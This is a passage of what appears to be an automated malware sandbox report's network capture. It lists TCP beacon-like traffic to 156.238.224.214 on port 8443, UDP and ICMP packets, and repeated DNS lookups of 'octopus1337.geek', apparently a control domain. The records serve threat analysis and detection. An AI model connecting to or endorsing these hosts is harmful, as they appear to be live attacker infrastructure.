                                                Oct 6, 2024 15:53:00.446546078 CEST844334186156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:01.470154047 CEST341888443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:01.475068092 CEST844334188156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:01.475136995 CEST341888443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:01.475162983 CEST341888443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:01.480243921 CEST844334188156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:01.480293036 CEST341888443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:01.485482931 CEST844334188156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:02.082568884 CEST844334188156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:02.082695007 CEST341888443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:02.087806940 CEST844334188156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:02.139079094 CEST341908443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:02.144042015 CEST844334190156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:02.144115925 CEST341908443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:02.144115925 CEST341908443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:02.149044991 CEST844334190156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:02.149107933 CEST341908443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:02.154047966 CEST844334190156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:02.733463049 CEST844334190156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:02.733591080 CEST341908443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:02.738563061 CEST844334190156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.083477020 CEST341928443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.088499069 CEST844334192156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.088576078 CEST341928443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.088599920 CEST341928443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.093559027 CEST844334192156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.093666077 CEST341928443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.098774910 CEST844334192156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.672596931 CEST844334192156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.672682047 CEST341928443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.677503109 CEST844334192156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.761728048 CEST341948443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.766582012 CEST844334194156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.766637087 CEST341948443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.766652107 CEST341948443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.771539927 CEST844334194156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:03.771593094 CEST341948443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:03.776469946 CEST844334194156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:04.344873905 CEST844334194156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:04.344954967 CEST341948443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:04.349760056 CEST844334194156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:04.683624983 CEST341968443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:04.688445091 CEST844334196156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:04.688529015 CEST341968443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:04.688560963 CEST341968443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:04.693335056 CEST844334196156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:04.693383932 CEST341968443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:04.698298931 CEST844334196156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:05.257159948 CEST844334196156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:05.257236958 CEST341968443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:05.262048960 CEST844334196156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:05.346601963 CEST341988443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:05.351609945 CEST844334198156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:05.351686001 CEST341988443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:05.351686001 CEST341988443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:05.356782913 CEST844334198156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:05.356832981 CEST341988443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:05.361809969 CEST844334198156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:05.953908920 CEST844334198156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:05.954010963 CEST341988443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:05.958901882 CEST844334198156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:06.982172966 CEST342008443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:06.987261057 CEST844334200156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:06.987323999 CEST342008443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:06.987344027 CEST342008443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:06.992412090 CEST844334200156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:06.992455006 CEST342008443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:06.997414112 CEST844334200156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:07.567703009 CEST844334200156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:07.567822933 CEST342008443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:07.572868109 CEST844334200156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:08.568496943 CEST342028443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:08.573967934 CEST844334202156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:08.574062109 CEST342028443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:08.574104071 CEST342028443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:08.579102039 CEST844334202156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:08.579180002 CEST342028443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:08.584511995 CEST844334202156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:23.587455034 CEST342028443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:23.799411058 CEST342028443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:23.829456091 CEST844334202156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:23.829508066 CEST844334202156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:24.038168907 CEST844334202156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:24.038254023 CEST342028443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:31.275094032 CEST342048443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:31.280184031 CEST844334204156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:31.280255079 CEST342048443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:31.280272961 CEST342048443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:31.285191059 CEST844334204156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:31.285243034 CEST342048443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:31.290115118 CEST844334204156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:31.878596067 CEST844334204156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:31.878675938 CEST342048443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:31.883560896 CEST844334204156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:32.894705057 CEST342068443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:32.899629116 CEST844334206156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:32.899705887 CEST342068443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:32.899743080 CEST342068443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:32.904726028 CEST844334206156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:32.904783010 CEST342068443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:32.909626007 CEST844334206156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:33.482049942 CEST844334206156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:33.482137918 CEST342068443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:33.487040043 CEST844334206156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:34.532963037 CEST342088443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:34.537825108 CEST844334208156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:34.537921906 CEST342088443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:34.537936926 CEST342088443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:34.542742968 CEST844334208156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:34.542809963 CEST342088443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:34.547641993 CEST844334208156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:35.130346060 CEST844334208156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:35.130439997 CEST342088443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:35.135220051 CEST844334208156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:36.131191969 CEST342108443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:36.136264086 CEST844334210156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:36.136331081 CEST342108443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:36.136441946 CEST342108443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:36.141314983 CEST844334210156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:36.141361952 CEST342108443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:36.146178007 CEST844334210156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:36.725230932 CEST844334210156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:36.725321054 CEST342108443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:36.730326891 CEST844334210156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:37.726038933 CEST342128443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:37.731323957 CEST844334212156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:37.731417894 CEST342128443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:37.731451035 CEST342128443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:37.736434937 CEST844334212156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:37.736491919 CEST342128443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:37.741390944 CEST844334212156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:38.320255995 CEST844334212156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:38.320362091 CEST342128443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:53:38.325218916 CEST844334212156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:04.338745117 CEST342148443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:04.343713999 CEST844334214156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:04.343774080 CEST342148443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:04.343787909 CEST342148443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:04.348635912 CEST844334214156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:04.348683119 CEST342148443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:04.353606939 CEST844334214156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:04.942408085 CEST844334214156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:04.942507982 CEST342148443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:04.947479010 CEST844334214156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:05.954507113 CEST342168443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:05.962624073 CEST844334216156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:05.962708950 CEST342168443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:05.962735891 CEST342168443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:05.970356941 CEST844334216156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:05.970446110 CEST342168443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:05.976804018 CEST844334216156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:06.545253038 CEST844334216156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:06.545355082 CEST342168443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:06.550199986 CEST844334216156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:07.561919928 CEST342188443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:07.566951990 CEST844334218156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:07.567008972 CEST342188443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:07.567050934 CEST342188443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:07.571887970 CEST844334218156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:07.571943045 CEST342188443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:07.578701019 CEST844334218156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:08.152745008 CEST844334218156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:08.152834892 CEST342188443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:08.157741070 CEST844334218156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:09.153588057 CEST342208443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:09.158461094 CEST844334220156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:09.158529997 CEST342208443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:09.158560038 CEST342208443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:09.163481951 CEST844334220156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:09.163544893 CEST342208443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:09.168472052 CEST844334220156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:09.774864912 CEST844334220156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:09.774991035 CEST342208443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:09.779898882 CEST844334220156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:15.786304951 CEST342228443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:15.791273117 CEST844334222156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:15.791325092 CEST342228443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:15.791340113 CEST342228443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:15.796749115 CEST844334222156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:15.796833038 CEST342228443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:15.802828074 CEST844334222156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:16.391760111 CEST844334222156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:54:16.391844988 CEST342228443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:54:16.396738052 CEST844334222156.238.224.214192.168.2.14

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 6, 2024 15:52:24.549061060 CEST4626253192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:25.737874985 CEST6009553192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:29.553972006 CEST4644653192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:30.742733955 CEST4028053192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:34.558799028 CEST3688253192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:35.745918036 CEST3741353192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:39.563632965 CEST3360553192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:40.749479055 CEST3807653192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:44.565324068 CEST3786453192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:45.750473022 CEST4574153192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:52:51.168621063 CEST5774753192.168.2.14195.10.195.195
                                                Oct 6, 2024 15:52:51.177041054 CEST5357747195.10.195.195192.168.2.14
                                                Oct 6, 2024 15:52:52.339005947 CEST4025153192.168.2.14195.10.195.195
                                                Oct 6, 2024 15:52:52.346724987 CEST5340251195.10.195.195192.168.2.14
                                                Oct 6, 2024 15:52:54.677967072 CEST5370953192.168.2.14194.36.144.87
                                                Oct 6, 2024 15:52:54.687899113 CEST5353709194.36.144.87192.168.2.14
                                                Oct 6, 2024 15:52:55.505672932 CEST6041053192.168.2.14194.36.144.87
                                                Oct 6, 2024 15:52:55.515621901 CEST5360410194.36.144.87192.168.2.14
                                                Oct 6, 2024 15:52:56.291065931 CEST5556853192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:52:56.301194906 CEST6033753192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:52:56.311454058 CEST5446653192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:52:56.321398973 CEST5605053192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:52:56.331394911 CEST5761253192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:52:57.094173908 CEST3277553192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:52:57.104271889 CEST4952053192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:52:57.928498030 CEST4214353192.168.2.1481.169.136.222
                                                Oct 6, 2024 15:52:58.227760077 CEST534214381.169.136.222192.168.2.14
                                                Oct 6, 2024 15:53:01.442373991 CEST3304153192.168.2.1481.169.136.222
                                                Oct 6, 2024 15:53:01.470021009 CEST533304181.169.136.222192.168.2.14
                                                Oct 6, 2024 15:53:02.108531952 CEST5111053192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:02.118721008 CEST5339553192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:02.128933907 CEST4429753192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:03.734378099 CEST4807753192.168.2.1481.169.136.222
                                                Oct 6, 2024 15:53:03.761606932 CEST534807781.169.136.222192.168.2.14
                                                Oct 6, 2024 15:53:04.673497915 CEST5173853192.168.2.14194.36.144.87
                                                Oct 6, 2024 15:53:04.683526039 CEST5351738194.36.144.87192.168.2.14
                                                Oct 6, 2024 15:53:06.257945061 CEST5372253192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:53:06.954655886 CEST5842353192.168.2.1481.169.136.222
                                                Oct 6, 2024 15:53:06.982072115 CEST535842381.169.136.222192.168.2.14
                                                Oct 6, 2024 15:53:11.260366917 CEST3521653192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:53:16.263777018 CEST4187253192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:53:21.267549038 CEST3319153192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:53:26.271399021 CEST4328353192.168.2.14178.254.22.166
                                                Oct 6, 2024 15:53:32.879252911 CEST4829253192.168.2.1451.158.108.203
                                                Oct 6, 2024 15:53:32.894608974 CEST534829251.158.108.203192.168.2.14
                                                Oct 6, 2024 15:53:34.482851028 CEST3785953192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:34.493046999 CEST5128353192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:34.503165960 CEST5354853192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:34.513057947 CEST4883953192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:34.522962093 CEST4792253192.168.2.1494.16.114.254
                                                Oct 6, 2024 15:53:39.321141005 CEST4268153192.168.2.1491.217.137.37
                                                Oct 6, 2024 15:53:44.322494984 CEST3588853192.168.2.1491.217.137.37
                                                Oct 6, 2024 15:53:49.326324940 CEST4959153192.168.2.1491.217.137.37
                                                Oct 6, 2024 15:53:54.330120087 CEST5382753192.168.2.1491.217.137.37
                                                Oct 6, 2024 15:53:59.333924055 CEST3511153192.168.2.1491.217.137.37
                                                Oct 6, 2024 15:54:05.943413019 CEST3961253192.168.2.1451.77.149.139
                                                Oct 6, 2024 15:54:05.954407930 CEST533961251.77.149.139192.168.2.14
                                                Oct 6, 2024 15:54:07.546171904 CEST4404153192.168.2.1451.158.108.203
                                                Oct 6, 2024 15:54:07.561819077 CEST534404151.158.108.203192.168.2.14
                                                Oct 6, 2024 15:54:10.775684118 CEST4257453192.168.2.1451.77.149.139
                                                Oct 6, 2024 15:54:15.777076006 CEST5644553192.168.2.1451.77.149.139
                                                Oct 6, 2024 15:54:15.786151886 CEST535644551.77.149.139192.168.2.14

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Oct 6, 2024 15:52:56.301084995 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:52:56.311366081 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:52:56.321331978 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:52:56.331264973 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:52:56.341315031 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:52:57.104155064 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:02.118572950 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:02.128843069 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:02.138987064 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:34.492923975 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:34.503067017 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:34.512981892 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:34.522887945 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:34.532891035 CEST94.16.114.254192.168.2.1490fd(Port unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:39.374372005 CEST77.87.200.186192.168.2.148f5b(Host unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:44.375824928 CEST77.87.200.186192.168.2.148f5b(Host unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:49.379448891 CEST77.87.200.186192.168.2.148f5b(Host unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:54.381982088 CEST77.87.200.186192.168.2.148f5b(Host unreachable)Destination Unreachable
                                                Oct 6, 2024 15:53:59.387312889 CEST77.87.200.186192.168.2.148f5b(Host unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 6, 2024 15:52:24.549061060 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:25.737874985 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:29.553972006 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:30.742733955 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:34.558799028 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:35.745918036 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:39.563632965 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:40.749479055 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:44.565324068 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:45.750473022 CEST192.168.2.14178.254.22.1660xaaeeStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:51.168621063 CEST192.168.2.14195.10.195.1950x5e69Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:52.339005947 CEST192.168.2.14195.10.195.1950x5e69Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:54.677967072 CEST192.168.2.14194.36.144.870xc1bdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:55.505672932 CEST192.168.2.14194.36.144.870xc1bdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:56.291065931 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:56.301194906 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:56.311454058 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:56.321398973 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:56.331394911 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:57.094173908 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:57.104271889 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:52:57.928498030 CEST192.168.2.1481.169.136.2220x7650Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:01.442373991 CEST192.168.2.1481.169.136.2220x2af9Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:02.108531952 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:02.118721008 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:02.128933907 CEST192.168.2.1494.16.114.2540x3b0bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:03.734378099 CEST192.168.2.1481.169.136.2220x7650Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:04.673497915 CEST192.168.2.14194.36.144.870x3ee0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:06.257945061 CEST192.168.2.14178.254.22.1660x1a0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:06.954655886 CEST192.168.2.1481.169.136.2220x2af9Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:11.260366917 CEST192.168.2.14178.254.22.1660x1a0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:16.263777018 CEST192.168.2.14178.254.22.1660x1a0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:21.267549038 CEST192.168.2.14178.254.22.1660x1a0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:26.271399021 CEST192.168.2.14178.254.22.1660x1a0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:32.879252911 CEST192.168.2.1451.158.108.2030xa9d3Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:34.482851028 CEST192.168.2.1494.16.114.2540x95aaStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:34.493046999 CEST192.168.2.1494.16.114.2540x95aaStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                Oct 6, 2024 15:53:34.503165960 CEST192.168.2.1494.16.114.2540x95aaStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
